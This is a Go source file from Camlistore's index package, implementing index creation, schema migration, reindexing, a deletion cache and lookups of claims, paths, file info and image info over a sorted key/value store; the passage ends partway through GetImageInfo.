type Index struct {
*blobserver.NoImplStorage
s sorted.KeyValue
KeyFetcher blob.Fetcher // for verifying claims
// TODO(mpl): do not init and use deletes when we have a corpus. Since corpus has its own deletes now, they are redundant.
// deletes is a cache to keep track of the deletion status (deleted vs undeleted)
// of the blobs in the index. It makes for faster reads than the otherwise
// recursive calls on the index.
deletes *deletionCache
corpus *Corpus // or nil, if not being kept in memory
mu sync.RWMutex // guards following
// needs maps from a blob to the missing blobs it needs to
// finish indexing.
needs map[blob.Ref][]blob.Ref
// neededBy is the inverse of needs. The keys are missing blobs
// and the value(s) are blobs waiting to be reindexed.
neededBy map[blob.Ref][]blob.Ref
readyReindex map[blob.Ref]bool // set of things ready to be re-indexed
oooRunning bool // whether outOfOrderIndexerLoop is running.
// blobSource is used for fetching blobs when indexing files and other
// blobs types that reference other objects.
// The only write access to blobSource should be its initialization (transition
// from nil to non-nil), once, and protected by mu.
blobSource blobserver.FetcherEnumerator
tickleOoo chan bool // tickle out-of-order reindex loop, whenever readyReindex is added to
}
var (
_ blobserver.Storage = (*Index)(nil)
_ Interface = (*Index)(nil)
)
var aboutToReindex = false
// SetImpendingReindex notes that the user ran the camlistored binary with the --reindex flag.
// Because the index is about to be wiped, schema version checks should be suppressed.
func SetImpendingReindex() {
// TODO: remove this function, once we refactor how indexes are created.
// They'll probably not all have their own storage constructor registered.
aboutToReindex = true
}
// MustNew wraps New and fails with a Fatal error on t if New
// returns an error.
func MustNew(t types.TB, s sorted.KeyValue) *Index {
ix, err := New(s)
if err != nil {
t.Fatalf("Error creating index: %v", err)
}
return ix
}
// InitBlobSource sets the index's blob source and starts the background
// out-of-order indexing loop. It panics if the blobSource is already set.
// If the index's key fetcher is nil, it is also set to the blobSource
// argument.
func (x *Index) InitBlobSource(blobSource blobserver.FetcherEnumerator) {
x.mu.Lock()
defer x.mu.Unlock()
if x.blobSource != nil {
panic("blobSource of Index already set")
}
x.blobSource = blobSource
if x.oooRunning {
panic("outOfOrderIndexerLoop should never have previously started without a blobSource")
}
if x.KeyFetcher == nil {
x.KeyFetcher = blobSource
}
if disableOoo, _ := strconv.ParseBool(os.Getenv("CAMLI_TESTREINDEX_DISABLE_OOO")); disableOoo {
// For Reindex test in pkg/index/indextest/tests.go
return
}
go x.outOfOrderIndexerLoop()
}
// New returns a new index using the provided key/value storage implementation.
func New(s sorted.KeyValue) (*Index, error) {
idx := &Index{
s: s,
needs: make(map[blob.Ref][]blob.Ref),
neededBy: make(map[blob.Ref][]blob.Ref),
readyReindex: make(map[blob.Ref]bool),
tickleOoo: make(chan bool, 1),
}
if aboutToReindex {
idx.deletes = newDeletionCache()
return idx, nil
}
schemaVersion := idx.schemaVersion()
switch {
case schemaVersion == 0 && idx.isEmpty():
// New index.
err := idx.s.Set(keySchemaVersion.name, fmt.Sprint(requiredSchemaVersion))
if err != nil {
return nil, fmt.Errorf("Could not write index schema version %q: %v", requiredSchemaVersion, err)
}
case schemaVersion != requiredSchemaVersion:
tip := ""
if env.IsDev() {
// Good signal that we're using the devcam server, so help out
// the user with a more useful tip:
tip = `(For the dev server, run "devcam server --wipe" to wipe both your blobs and index)`
} else {
if is4To5SchemaBump(schemaVersion) {
return idx, errMissingWholeRef
}
tip = "Run 'camlistored --reindex' (it might take awhile, but shows status). Alternative: 'camtool dbinit' (or just delete the file for a file based index), and then 'camtool sync --all'"
}
return nil, fmt.Errorf("index schema version is %d; required one is %d. You need to reindex. %s",
schemaVersion, requiredSchemaVersion, tip)
}
if err := idx.initDeletesCache(); err != nil {
return nil, fmt.Errorf("Could not initialize index's deletes cache: %v", err)
}
if err := idx.initNeededMaps(); err != nil {
return nil, fmt.Errorf("Could not initialize index's missing blob maps: %v", err)
}
return idx, nil
}
func is4To5SchemaBump(schemaVersion int) bool {
return schemaVersion == 4 && requiredSchemaVersion == 5
}
var errMissingWholeRef = errors.New("missing wholeRef field in fileInfo rows")
// fixMissingWholeRef appends the wholeRef to the values of all the keyFileInfo rows. It should
// only be called to upgrade a version 4 index schema to version 5.
func (x *Index) fixMissingWholeRef(fetcher blob.Fetcher) (err error) {
// We did that check from the caller, but double-check again to prevent from misuse
// of that function.
if x.schemaVersion() != 4 || requiredSchemaVersion != 5 {
panic("fixMissingWholeRef should only be used when upgrading from v4 to v5 of the index schema")
}
log.Println("index: fixing the missing wholeRef in the fileInfo rows...")
defer func() {
if err != nil {
log.Printf("index: fixing the fileInfo rows failed: %v", err)
return
}
log.Print("index: successfully fixed wholeRef in FileInfo rows.")
}()
// first build a reverted keyWholeToFileRef map, so we can get the wholeRef from the fileRef easily.
fileRefToWholeRef := make(map[blob.Ref]blob.Ref)
it := x.queryPrefix(keyWholeToFileRef)
var keyA [3]string
for it.Next() {
keyPart := strutil.AppendSplitN(keyA[:0], it.Key(), "|", 3)
if len(keyPart) != 3 {
return fmt.Errorf("bogus keyWholeToFileRef key: got %q, wanted \"wholetofile|wholeRef|fileRef\"", it.Key())
}
wholeRef, ok1 := blob.Parse(keyPart[1])
fileRef, ok2 := blob.Parse(keyPart[2])
if !ok1 || !ok2 {
return fmt.Errorf("bogus part in keyWholeToFileRef key: %q", it.Key())
}
fileRefToWholeRef[fileRef] = wholeRef
}
if err := it.Close(); err != nil {
return err
}
// We record the mutations and set them all after the iteration because of the sqlite locking:
// since BeginBatch takes a lock, and Find too, we would deadlock at queryPrefix if we
// started a batch mutation before.
mutations := make(map[string]string)
keyPrefix := keyFileInfo.name + "|"
it = x.queryPrefix(keyFileInfo)
defer it.Close()
var valA [3]string
for it.Next() {
br, ok := blob.ParseBytes(it.KeyBytes()[len(keyPrefix):])
if !ok {
return fmt.Errorf("invalid blobRef %q", it.KeyBytes()[len(keyPrefix):])
}
wholeRef, ok := fileRefToWholeRef[br]
if !ok {
log.Printf("WARNING: wholeRef for %v not found in index. You should probably rebuild the whole index.", br)
continue
}
valPart := strutil.AppendSplitN(valA[:0], it.Value(), "|", 3)
// The old format we're fixing should be: size|filename|mimetype
if len(valPart) != 3 {
return fmt.Errorf("bogus keyFileInfo value: got %q, wanted \"size|filename|mimetype\"", it.Value())
}
size_s, filename, mimetype := valPart[0], valPart[1], urld(valPart[2])
if strings.Contains(mimetype, "|") {
// I think this can only happen for people migrating from a commit at least as recent as
// 8229c1985079681a652cb65551b4e80a10d135aa, when wholeRef was introduced to keyFileInfo
// but there was no migration code yet.
// For the "production" migrations between 0.8 and 0.9, the index should not have any wholeRef
// in the keyFileInfo entries. So if something goes wrong and is somehow linked to that happening,
// I'd like to know about it, hence the logging.
log.Printf("%v: %v already has a wholeRef, not fixing it", it.Key(), it.Value())
continue
}
size, err := strconv.Atoi(size_s)
if err != nil {
return fmt.Errorf("bogus size in keyFileInfo value %v: %v", it.Value(), err)
}
mutations[keyFileInfo.Key(br)] = keyFileInfo.Val(size, filename, mimetype, wholeRef)
}
if err := it.Close(); err != nil {
return err
}
bm := x.s.BeginBatch()
for k, v := range mutations {
bm.Set(k, v)
}
bm.Set(keySchemaVersion.name, "5")
if err := x.s.CommitBatch(bm); err != nil {
return err
}
return nil
}
func newFromConfig(ld blobserver.Loader, config jsonconfig.Obj) (blobserver.Storage, error) {
blobPrefix := config.RequiredString("blobSource")
kvConfig := config.RequiredObject("storage")
if err := config.Validate(); err != nil {
return nil, err
}
kv, err := sorted.NewKeyValue(kvConfig)
if err != nil {
return nil, err
}
sto, err := ld.GetStorage(blobPrefix)
if err != nil {
return nil, err
}
ix, err := New(kv)
// TODO(mpl): next time we need to do another fix, make a new error
// type that lets us apply the needed fix depending on its value or
// something. For now just one value/fix.
if err == errMissingWholeRef {
// TODO: maybe we don't want to do that automatically. Brad says
// we have to think about the case on GCE/CoreOS in particular.
if err := ix.fixMissingWholeRef(sto); err != nil {
ix.Close()
return nil, fmt.Errorf("could not fix missing wholeRef entries: %v", err)
}
ix, err = New(kv)
}
if err != nil {
return nil, err
}
ix.InitBlobSource(sto)
return ix, err
}
func (x *Index) String() string {
return fmt.Sprintf("Camlistore index, using key/value implementation %T", x.s)
}
func (x *Index) isEmpty() bool {
iter := x.s.Find("", "")
hasRows := iter.Next()
if err := iter.Close(); err != nil {
panic(err)
}
return !hasRows
}
// reindexMaxProcs is the number of concurrent goroutines that will be used for reindexing.
var reindexMaxProcs = struct {
sync.RWMutex
v int
}{v: 4}
// SetReindexMaxProcs sets the maximum number of concurrent goroutines that are
// used during reindexing.
func SetReindexMaxProcs(n int) {
reindexMaxProcs.Lock()
defer reindexMaxProcs.Unlock()
reindexMaxProcs.v = n
}
// ReindexMaxProcs returns the maximum number of concurrent goroutines that are
// used during reindexing.
func ReindexMaxProcs() int {
reindexMaxProcs.RLock()
defer reindexMaxProcs.RUnlock()
return reindexMaxProcs.v
}
func (x *Index) Reindex() error {
reindexMaxProcs.RLock()
defer reindexMaxProcs.RUnlock()
ctx := context.TODO()
wiper, ok := x.s.(sorted.Wiper)
if !ok {
return fmt.Errorf("index's storage type %T doesn't support sorted.Wiper", x.s)
}
log.Printf("Wiping index storage type %T ...", x.s)
if err := wiper.Wipe(); err != nil {
return fmt.Errorf("error wiping index's sorted key/value type %T: %v", x.s, err)
}
log.Printf("Index wiped. Rebuilding...")
reindexStart, _ := blob.Parse(os.Getenv("CAMLI_REINDEX_START"))
err := x.s.Set(keySchemaVersion.name, fmt.Sprintf("%d", requiredSchemaVersion))
if err != nil {
return err
}
var nerrmu sync.Mutex
nerr := 0
blobc := make(chan blob.Ref, 32)
enumCtx := ctx.New()
enumErr := make(chan error, 1)
go func() {
defer close(blobc)
donec := enumCtx.Done()
var lastTick time.Time
enumErr <- blobserver.EnumerateAll(enumCtx, x.blobSource, func(sb blob.SizedRef) error {
now := time.Now()
if lastTick.Before(now.Add(-1 * time.Second)) {
log.Printf("Reindexing at %v", sb.Ref)
lastTick = now
}
if reindexStart.Valid() && sb.Ref.Less(reindexStart) {
return nil
}
select {
case <-donec:
return context.ErrCanceled
case blobc <- sb.Ref:
return nil
}
})
}()
var wg sync.WaitGroup
for i := 0; i < reindexMaxProcs.v; i++ {
wg.Add(1)
go func() {
defer wg.Done()
for br := range blobc {
if err := x.indexBlob(br); err != nil {
log.Printf("Error reindexing %v: %v", br, err)
nerrmu.Lock()
nerr++
nerrmu.Unlock()
// TODO: flag (or default?) to stop the EnumerateAll above once
// there's any error with reindexing?
}
}
}()
}
if err := <-enumErr; err != nil {
return err
}
wg.Wait()
x.mu.Lock()
readyCount := len(x.readyReindex)
x.mu.Unlock()
if readyCount > 0 {
return fmt.Errorf("%d blobs were ready to reindex in out-of-order queue, but not yet ran", readyCount)
}
log.Printf("Index rebuild complete.")
nerrmu.Lock() // no need to unlock
if nerr != 0 {
return fmt.Errorf("%d blobs failed to re-index", nerr)
}
if err := x.initDeletesCache(); err != nil {
return err
}
return nil
}
func queryPrefixString(s sorted.KeyValue, prefix string) sorted.Iterator {
if prefix == "" {
return s.Find("", "")
}
lastByte := prefix[len(prefix)-1]
if lastByte == 0xff {
panic("unsupported query prefix ending in 0xff")
}
end := prefix[:len(prefix)-1] + string(lastByte+1)
return s.Find(prefix, end)
}
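// Illustrative sketch (assumed prefix): for prefix "meta:" the exclusive upper
// bound becomes "meta;" (last byte incremented by one), so s.Find("meta:", "meta;")
// iterates exactly the keys starting with "meta:".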
func (x *Index) queryPrefixString(prefix string) sorted.Iterator {
return queryPrefixString(x.s, prefix)
}
func queryPrefix(s sorted.KeyValue, key *keyType, args ...interface{}) sorted.Iterator {
return queryPrefixString(s, key.Prefix(args...))
}
func (x *Index) queryPrefix(key *keyType, args ...interface{}) sorted.Iterator {
return x.queryPrefixString(key.Prefix(args...))
}
func closeIterator(it sorted.Iterator, perr *error) {
err := it.Close()
if err != nil && *perr == nil {
*perr = err
}
}
// schemaVersion returns the version of schema as it is found
// in the currently used index. If not found, it returns 0.
func (x *Index) schemaVersion() int {
schemaVersionStr, err := x.s.Get(keySchemaVersion.name)
if err != nil {
if err == sorted.ErrNotFound {
return 0
}
panic(fmt.Sprintf("Could not get index schema version: %v", err))
}
schemaVersion, err := strconv.Atoi(schemaVersionStr)
if err != nil {
panic(fmt.Sprintf("Bogus index schema version: %q", schemaVersionStr))
}
return schemaVersion
}
type deletion struct {
deleter blob.Ref
when time.Time
}
type byDeletionDate []deletion
func (d byDeletionDate) Len() int { return len(d) }
func (d byDeletionDate) Swap(i, j int) { d[i], d[j] = d[j], d[i] }
func (d byDeletionDate) Less(i, j int) bool { return d[i].when.Before(d[j].when) }
type deletionCache struct {
sync.RWMutex
m map[blob.Ref][]deletion
}
func newDeletionCache() *deletionCache {
return &deletionCache{
m: make(map[blob.Ref][]deletion),
}
}
// initDeletesCache creates and populates the deletion status cache used by the index
// for faster calls to IsDeleted and DeletedAt. It is called by New.
func (x *Index) initDeletesCache() (err error) {
x.deletes = newDeletionCache()
it := x.queryPrefix(keyDeleted)
defer closeIterator(it, &err)
for it.Next() {
cl, ok := kvDeleted(it.Key())
if !ok {
return fmt.Errorf("Bogus keyDeleted entry key: want |\"deleted\"|<deleted blobref>|<reverse claimdate>|<deleter claim>|, got %q", it.Key())
}
targetDeletions := append(x.deletes.m[cl.Target],
deletion{
deleter: cl.BlobRef,
when: cl.Date,
})
sort.Sort(sort.Reverse(byDeletionDate(targetDeletions)))
x.deletes.m[cl.Target] = targetDeletions
}
return err
}
func kvDeleted(k string) (c camtypes.Claim, ok bool) {
// TODO(bradfitz): garbage
keyPart := strings.Split(k, "|")
if len(keyPart) != 4 {
return
}
if keyPart[0] != "deleted" {
return
}
target, ok := blob.Parse(keyPart[1])
if !ok {
return
}
claimRef, ok := blob.Parse(keyPart[3])
if !ok {
return
}
date, err := time.Parse(time.RFC3339, unreverseTimeString(keyPart[2]))
if err != nil {
return
}
return camtypes.Claim{
BlobRef: claimRef,
Target: target,
Date: date,
Type: string(schema.DeleteClaim),
}, true
}
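// Illustrative sketch (hypothetical blobrefs): a row key such as
// "deleted|sha1-TARGET|<reverse RFC3339 date>|sha1-CLAIM" parses into a Claim
// whose Target is sha1-TARGET, whose BlobRef is the deleter claim sha1-CLAIM,
// and whose Date is the un-reversed claim date, with the delete claim type.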
// IsDeleted reports whether the provided blobref (of a permanode or
// claim) should be considered deleted.
func (x *Index) IsDeleted(br blob.Ref) bool {
if x.deletes == nil {
// We still allow the slow path, in case someone creates
// their own Index without a deletes cache.
return x.isDeletedNoCache(br)
}
x.deletes.RLock()
defer x.deletes.RUnlock()
return x.isDeleted(br)
}
// The caller must hold x.deletes.mu for read.
func (x *Index) isDeleted(br blob.Ref) bool {
deletes, ok := x.deletes.m[br]
if !ok {
return false
}
for _, v := range deletes {
if !x.isDeleted(v.deleter) {
return true
}
}
return false
}
// Used when the Index has no deletes cache (x.deletes is nil).
func (x *Index) isDeletedNoCache(br blob.Ref) bool {
var err error
it := x.queryPrefix(keyDeleted, br)
for it.Next() {
cl, ok := kvDeleted(it.Key())
if !ok {
panic(fmt.Sprintf("Bogus keyDeleted entry key: want |\"deleted\"|<deleted blobref>|<reverse claimdate>|<deleter claim>|, got %q", it.Key()))
}
if !x.isDeletedNoCache(cl.BlobRef) {
closeIterator(it, &err)
if err != nil {
// TODO: Do better?
panic(fmt.Sprintf("Could not close iterator on keyDeleted: %v", err))
}
return true
}
}
closeIterator(it, &err)
if err != nil {
// TODO: Do better?
panic(fmt.Sprintf("Could not close iterator on keyDeleted: %v", err))
}
return false
}
// GetRecentPermanodes sends results to dest filtered by owner, limit, and
// before. A zero value for before will default to the current time. The
// results will have duplicates suppressed, with the most recent permanode
// returned.
// Note, permanodes more recent than before will still be fetched from the
// index then skipped. This means runtime scales linearly with the number of
// nodes more recent than before.
func (x *Index) GetRecentPermanodes(dest chan<- camtypes.RecentPermanode, owner blob.Ref, limit int, before time.Time) (err error) {
defer close(dest)
keyId, err := x.KeyId(owner)
if err == sorted.ErrNotFound {
log.Printf("No recent permanodes because keyId for owner %v not found", owner)
return nil
}
if err != nil {
log.Printf("Error fetching keyId for owner %v: %v", owner, err)
return err
}
sent := 0
var seenPermanode dupSkipper
if before.IsZero() {
before = time.Now()
}
// TODO(bradfitz): handle before efficiently. don't use queryPrefix.
it := x.queryPrefix(keyRecentPermanode, keyId)
defer closeIterator(it, &err)
for it.Next() {
permaStr := it.Value()
parts := strings.SplitN(it.Key(), "|", 4)
if len(parts) != 4 {
continue
}
mTime, _ := time.Parse(time.RFC3339, unreverseTimeString(parts[2]))
permaRef, ok := blob.Parse(permaStr)
if !ok {
continue
}
if x.IsDeleted(permaRef) {
continue
}
if seenPermanode.Dup(permaStr) {
continue
}
// Skip entries with an mTime less than or equal to before.
if !mTime.Before(before) {
continue
}
dest <- camtypes.RecentPermanode{
Permanode: permaRef,
Signer: owner, // TODO(bradfitz): kinda. usually. for now.
LastModTime: mTime,
}
sent++
if sent == limit {
break
}
}
return nil
}
func (x *Index) AppendClaims(dst []camtypes.Claim, permaNode blob.Ref,
signerFilter blob.Ref,
attrFilter string) ([]camtypes.Claim, error) {
if x.corpus != nil {
return x.corpus.AppendClaims(dst, permaNode, signerFilter, attrFilter)
}
var (
keyId string
err error
it sorted.Iterator
)
if signerFilter.Valid() {
keyId, err = x.KeyId(signerFilter)
if err == sorted.ErrNotFound {
return nil, nil
}
if err != nil {
return nil, err
}
it = x.queryPrefix(keyPermanodeClaim, permaNode, keyId)
} else {
it = x.queryPrefix(keyPermanodeClaim, permaNode)
}
defer closeIterator(it, &err)
// In the common case, an attribute filter is just a plain
// token ("camliContent") unescaped. If so, fast path that
// check to skip the row before we even split it.
var mustHave string
if attrFilter != "" && urle(attrFilter) == attrFilter {
mustHave = attrFilter
}
for it.Next() {
val := it.Value()
if mustHave != "" && !strings.Contains(val, mustHave) {
continue
}
cl, ok := kvClaim(it.Key(), val, blob.Parse)
if !ok {
continue
}
if x.IsDeleted(cl.BlobRef) {
continue
}
if attrFilter != "" && cl.Attr != attrFilter {
continue
}
if signerFilter.Valid() && cl.Signer != signerFilter {
continue
}
dst = append(dst, cl)
}
return dst, nil
}
func kvClaim(k, v string, blobParse func(string) (blob.Ref, bool)) (c camtypes.Claim, ok bool) {
const nKeyPart = 5
const nValPart = 4
var keya [nKeyPart]string
var vala [nValPart]string
keyPart := strutil.AppendSplitN(keya[:0], k, "|", -1)
valPart := strutil.AppendSplitN(vala[:0], v, "|", -1)
if len(keyPart) < nKeyPart || len(valPart) < nValPart {
return
}
signerRef, ok := blobParse(valPart[3])
if !ok {
return
}
permaNode, ok := blobParse(keyPart[1])
if !ok {
return
}
claimRef, ok := blobParse(keyPart[4])
if !ok {
return
}
date, err := time.Parse(time.RFC3339, keyPart[3])
if err != nil {
return
}
return camtypes.Claim{
BlobRef: claimRef,
Signer: signerRef,
Permanode: permaNode,
Date: date,
Type: urld(valPart[0]),
Attr: urld(valPart[1]),
Value: urld(valPart[2]),
}, true
}
func (x *Index) GetBlobMeta(br blob.Ref) (camtypes.BlobMeta, error) {
if x.corpus != nil {
return x.corpus.GetBlobMeta(br)
}
key := "meta:" + br.String()
meta, err := x.s.Get(key)
if err == sorted.ErrNotFound {
err = os.ErrNotExist
}
if err != nil {
return camtypes.BlobMeta{}, err
}
pos := strings.Index(meta, "|")
if pos < 0 {
panic(fmt.Sprintf("Bogus index row for key %q: got value %q", key, meta))
}
size, err := strconv.ParseUint(meta[:pos], 10, 32)
if err != nil {
return camtypes.BlobMeta{}, err
}
mime := meta[pos+1:]
return camtypes.BlobMeta{
Ref: br,
Size: uint32(size),
CamliType: camliTypeFromMIME(mime),
}, nil
}
func (x *Index) KeyId(signer blob.Ref) (string, error) {
if x.corpus != nil {
return x.corpus.KeyId(signer)
}
return x.s.Get("signerkeyid:" + signer.String())
}
func (x *Index) PermanodeOfSignerAttrValue(signer blob.Ref, attr, val string) (permaNode blob.Ref, err error) {
keyId, err := x.KeyId(signer)
if err == sorted.ErrNotFound {
return blob.Ref{}, os.ErrNotExist
}
if err != nil {
return blob.Ref{}, err
}
it := x.queryPrefix(keySignerAttrValue, keyId, attr, val)
defer closeIterator(it, &err)
for it.Next() {
permaRef, ok := blob.Parse(it.Value())
if ok && !x.IsDeleted(permaRef) {
return permaRef, nil
}
}
return blob.Ref{}, os.ErrNotExist
}
// This is just like PermanodeOfSignerAttrValue except we return multiple and dup-suppress.
// If request.Query is "", it is not used in the prefix search.
func (x *Index) SearchPermanodesWithAttr(dest chan<- blob.Ref, request *camtypes.PermanodeByAttrRequest) (err error) {
defer close(dest)
if request.FuzzyMatch {
// TODO(bradfitz): remove this for now? figure out how to handle it generically?
return errors.New("TODO: SearchPermanodesWithAttr: generic indexer doesn't support FuzzyMatch on PermanodeByAttrRequest")
}
if request.Attribute == "" {
return errors.New("index: missing Attribute in SearchPermanodesWithAttr")
}
keyId, err := x.KeyId(request.Signer)
if err == sorted.ErrNotFound {
return nil
}
if err != nil {
return err
}
seen := make(map[string]bool)
var it sorted.Iterator
if request.Query == "" {
it = x.queryPrefix(keySignerAttrValue, keyId, request.Attribute)
} else {
it = x.queryPrefix(keySignerAttrValue, keyId, request.Attribute, request.Query)
}
defer closeIterator(it, &err)
for it.Next() {
cl, ok := kvSignerAttrValue(it.Key(), it.Value())
if !ok {
continue
}
if x.IsDeleted(cl.BlobRef) {
continue
}
if x.IsDeleted(cl.Permanode) {
continue
}
pnstr := cl.Permanode.String()
if seen[pnstr] {
continue
}
seen[pnstr] = true
dest <- cl.Permanode
if len(seen) == request.MaxResults {
break
}
}
return nil
}
func kvSignerAttrValue(k, v string) (c camtypes.Claim, ok bool) {
// TODO(bradfitz): garbage
keyPart := strings.Split(k, "|")
valPart := strings.Split(v, "|")
if len(keyPart) != 6 || len(valPart) != 1 {
// TODO(mpl): use glog
log.Printf("bogus keySignerAttrValue index entry: %q = %q", k, v)
return
}
if keyPart[0] != "signerattrvalue" {
return
}
date, err := time.Parse(time.RFC3339, unreverseTimeString(keyPart[4]))
if err != nil {
log.Printf("bogus time in keySignerAttrValue index entry: %q", keyPart[4])
return
}
claimRef, ok := blob.Parse(keyPart[5])
if !ok {
log.Printf("bogus claim in keySignerAttrValue index entry: %q", keyPart[5])
return
}
permaNode, ok := blob.Parse(valPart[0])
if !ok {
log.Printf("bogus permanode in keySignerAttrValue index entry: %q", valPart[0])
return
}
return camtypes.Claim{
BlobRef: claimRef,
Permanode: permaNode,
Date: date,
Attr: urld(keyPart[2]),
Value: urld(keyPart[3]),
}, true
}
func (x *Index) PathsOfSignerTarget(signer, target blob.Ref) (paths []*camtypes.Path, err error) {
paths = []*camtypes.Path{}
keyId, err := x.KeyId(signer)
if err != nil {
if err == sorted.ErrNotFound {
err = nil
}
return
}
mostRecent := make(map[string]*camtypes.Path)
maxClaimDates := make(map[string]time.Time)
it := x.queryPrefix(keyPathBackward, keyId, target)
defer closeIterator(it, &err)
for it.Next() {
p, ok, active := kvPathBackward(it.Key(), it.Value())
if !ok {
continue
}
if x.IsDeleted(p.Claim) {
continue
}
if x.IsDeleted(p.Base) {
continue
}
key := p.Base.String() + "/" + p.Suffix
if p.ClaimDate.After(maxClaimDates[key]) {
maxClaimDates[key] = p.ClaimDate
if active {
mostRecent[key] = &p
} else {
delete(mostRecent, key)
}
}
}
for _, v := range mostRecent {
paths = append(paths, v)
}
return paths, nil
}
func kvPathBackward(k, v string) (p camtypes.Path, ok bool, active bool) {
// TODO(bradfitz): garbage
keyPart := strings.Split(k, "|")
valPart := strings.Split(v, "|")
if len(keyPart) != 4 || len(valPart) != 4 {
// TODO(mpl): use glog
log.Printf("bogus keyPathBackward index entry: %q = %q", k, v)
return
}
if keyPart[0] != "signertargetpath" {
return
}
target, ok := blob.Parse(keyPart[2])
if !ok {
log.Printf("bogus target in keyPathBackward index entry: %q", keyPart[2])
return
}
claim, ok := blob.Parse(keyPart[3])
if !ok {
log.Printf("bogus claim in keyPathBackward index entry: %q", keyPart[3])
return
}
date, err := time.Parse(time.RFC3339, valPart[0])
if err != nil {
log.Printf("bogus date in keyPathBackward index entry: %q", valPart[0])
return
}
base, ok := blob.Parse(valPart[1])
if !ok {
log.Printf("bogus base in keyPathBackward index entry: %q", valPart[1])
return
}
if valPart[2] == "Y" {
active = true
}
return camtypes.Path{
Claim: claim,
Base: base,
Target: target,
ClaimDate: date,
Suffix: urld(valPart[3]),
}, true, active
}
func (x *Index) PathsLookup(signer, base blob.Ref, suffix string) (paths []*camtypes.Path, err error) {
paths = []*camtypes.Path{}
keyId, err := x.KeyId(signer)
if err != nil {
if err == sorted.ErrNotFound {
err = nil
}
return
}
it := x.queryPrefix(keyPathForward, keyId, base, suffix)
defer closeIterator(it, &err)
for it.Next() {
p, ok, active := kvPathForward(it.Key(), it.Value())
if !ok {
continue
}
if x.IsDeleted(p.Claim) {
continue
}
if x.IsDeleted(p.Target) {
continue
}
// TODO(bradfitz): investigate what's up with deleted
// forward path claims here. Needs docs with the
// interface too, and tests.
_ = active
paths = append(paths, &p)
}
return
}
func kvPathForward(k, v string) (p camtypes.Path, ok bool, active bool) {
// TODO(bradfitz): garbage
keyPart := strings.Split(k, "|")
valPart := strings.Split(v, "|")
if len(keyPart) != 6 || len(valPart) != 2 {
// TODO(mpl): use glog
log.Printf("bogus keyPathForward index entry: %q = %q", k, v)
return
}
if keyPart[0] != "path" {
return
}
base, ok := blob.Parse(keyPart[2])
if !ok {
log.Printf("bogus base in keyPathForward index entry: %q", keyPart[2])
return
}
date, err := time.Parse(time.RFC3339, unreverseTimeString(keyPart[4]))
if err != nil {
log.Printf("bogus date in keyPathForward index entry: %q", keyPart[4])
return
}
claim, ok := blob.Parse(keyPart[5])
if !ok {
log.Printf("bogus claim in keyPathForward index entry: %q", keyPart[5])
return
}
if valPart[0] == "Y" {
active = true
}
target, ok := blob.Parse(valPart[1])
if !ok {
log.Printf("bogus target in keyPathForward index entry: %q", valPart[1])
return
}
return camtypes.Path{
Claim: claim,
Base: base,
Target: target,
ClaimDate: date,
Suffix: urld(keyPart[3]),
}, true, active
}
func (x *Index) PathLookup(signer, base blob.Ref, suffix string, at time.Time) (*camtypes.Path, error) {
paths, err := x.PathsLookup(signer, base, suffix)
if err != nil {
return nil, err
}
var (
newest = int64(0)
atSeconds = int64(0)
best *camtypes.Path
)
if !at.IsZero() {
atSeconds = at.Unix()
}
for _, path := range paths {
t := path.ClaimDate
secs := t.Unix()
if atSeconds != 0 && secs > atSeconds {
// Too new
continue
}
if newest > secs {
// Too old
continue
}
// Just right
newest, best = secs, path
}
if best == nil {
return nil, os.ErrNotExist
}
return best, nil
}
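// ExistingFileSchemas returns the refs of indexed file schema blobs whose
// whole-file contents are wholeRef.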
func (x *Index) ExistingFileSchemas(wholeRef blob.Ref) (schemaRefs []blob.Ref, err error) {
it := x.queryPrefix(keyWholeToFileRef, wholeRef)
defer closeIterator(it, &err)
for it.Next() {
keyPart := strings.Split(it.Key(), "|")[1:]
if len(keyPart) < 2 {
continue
}
ref, ok := blob.Parse(keyPart[1])
if ok {
schemaRefs = append(schemaRefs, ref)
}
}
return schemaRefs, nil
}
func (x *Index) loadKey(key string, val *string, err *error, wg *sync.WaitGroup) {
defer wg.Done()
*val, *err = x.s.Get(key)
}
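// GetFileInfo returns the indexed metadata (size, file name, MIME type,
// times, and whole-file ref) of the file schema blob fileRef.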
func (x *Index) GetFileInfo(fileRef blob.Ref) (camtypes.FileInfo, error) {
if x.corpus != nil {
return x.corpus.GetFileInfo(fileRef)
}
ikey := "fileinfo|" + fileRef.String()
tkey := "filetimes|" + fileRef.String()
// TODO: switch this to use syncutil.Group
wg := new(sync.WaitGroup)
wg.Add(2)
var iv, tv string // info value, time value
var ierr, terr error
go x.loadKey(ikey, &iv, &ierr, wg)
go x.loadKey(tkey, &tv, &terr, wg)
wg.Wait()
if ierr == sorted.ErrNotFound {
return camtypes.FileInfo{}, os.ErrNotExist
}
if ierr != nil {
return camtypes.FileInfo{}, ierr
}
valPart := strings.Split(iv, "|")
if len(valPart) < 3 {
log.Printf("index: bogus key %q = %q", ikey, iv)
return camtypes.FileInfo{}, os.ErrNotExist
}
var wholeRef blob.Ref
if len(valPart) >= 4 {
wholeRef, _ = blob.Parse(valPart[3])
}
size, err := strconv.ParseInt(valPart[0], 10, 64)
if err != nil {
log.Printf("index: bogus integer at position 0 in key %q = %q", ikey, iv)
return camtypes.FileInfo{}, os.ErrNotExist
}
fileName := urld(valPart[1])
fi := camtypes.FileInfo{
Size: size,
FileName: fileName,
MIMEType: urld(valPart[2]),
WholeRef: wholeRef,
}
if tv != "" {
times := strings.Split(urld(tv), ",")
updateFileInfoTimes(&fi, times)
}
return fi, nil
}
func updateFileInfoTimes(fi *camtypes.FileInfo, times []string) {
if len(times) == 0 {
return
}
fi.Time = types.ParseTime3339OrNil(times[0])
if len(times) == 2 {
fi.ModTime = types.ParseTime3339OrNil(times[1])
}
}
// v is "width|height"
func kvImageInfo(v []byte) (ii camtypes.ImageInfo, ok bool) {
pipei := bytes.IndexByte(v, '|')
if pipei < 0 {
return
}
w, err := strutil.ParseUintBytes(v[:pipei], 10, 16)
if err != nil {
return
}
h, err := strutil.ParseUintBytes(v[pipei+1:], 10, 16)
if err != nil {
return
}
ii.Width = uint16(w)
ii.Height = uint16(h)
return ii, true
}
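// GetImageInfo returns the indexed width and height of the image described by
// the file schema blob fileRef.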
func (x *Index) GetImageInfo(fileRef blob.Ref) (camtypes.ImageInfo, error) {
if x.corpus != nil {
return x.corpus.GetImageInfo(fileRef)
}
// it might be that the key does not exist because image.DecodeConfig failed earlier
// (because of unsupported JPEG features like progressive mode).
key := keyImageSize.Key(fileRef.String())
v, err := x.s.Get(key)
if err == sorted.ErrNotFound {
err = os.ErrNotExist
}
if err != nil {
return camtypes.ImageInfo{}, err
}
ii, ok := kvImageInfo([]byte(v))
if !ok {
